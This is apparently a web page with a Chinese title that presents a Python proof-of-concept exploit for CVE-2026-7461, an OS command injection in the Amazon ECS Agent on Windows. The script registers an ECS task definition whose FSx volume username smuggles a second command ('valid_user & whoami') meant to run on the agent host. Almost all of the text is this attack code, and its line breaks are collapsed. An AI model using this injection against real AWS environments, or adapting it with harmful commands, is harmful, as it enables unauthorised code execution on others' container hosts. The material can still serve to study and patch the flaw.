CVE-2026-7461: Amazon ECS Agent Windows命令注入漏洞

import boto3 def exploit_cve_2026_7461(cluster_name, task_def_family, fsx_id, secret_arn): """ PoC for CVE-2026-7461 Demonstrates OS Command Injection via FSx username in ECS Task Definition. Requires: boto3, AWS credentials with ecs:RegisterTaskDefinition permissions. """ client = boto3.client('ecs') # Malicious payload: 'user & whoami' (Will execute 'whoami' on the host) # Note: The actual command execution context depends on the ECS Agent implementation. malicious_username = "valid_user & whoami" container_definitions = [ { "name": "windows_container", "image": "mcr.microsoft.com/windows/servercore:ltsc2019", "cpu": 1024, "memory": 2048, "essential": True } ] volume_configuration = { "name": "fsx_volume", "fsxWindowsFileServerVolumeConfiguration": { "fileSystemId": fsx_id, "rootDirectory": "\\", "authorizationConfig": { "credentialsParameter": secret_arn, "domain": "corp.example.com", # VULNERABLE PARAMETER: User input is not sanitized "user": malicious_username } } } try: response = client.register_task_definition( family=task_def_family, containerDefinitions=container_definitions, volumes=[volume_configuration], requiresCompatibilities=['EC2'], networkMode='bridge' ) print(f"[+] Task definition registered: {response['taskDefinition']['taskDefinitionArn']}") print("[+] Running this task will trigger the command injection on the ECS Agent host.") except Exception as e: print(f"[-] Error registering task definition: {e}") if __name__ == "__main__": # Placeholder values exploit_cve_2026_7461( cluster_name="default", task_def_family="exploit-poc", fsx_id="fs-0123456789abcdef0", secret_arn="arn:aws:secretsmanager:us-east-1:123456789012:secret:fsx-creds-abc123" )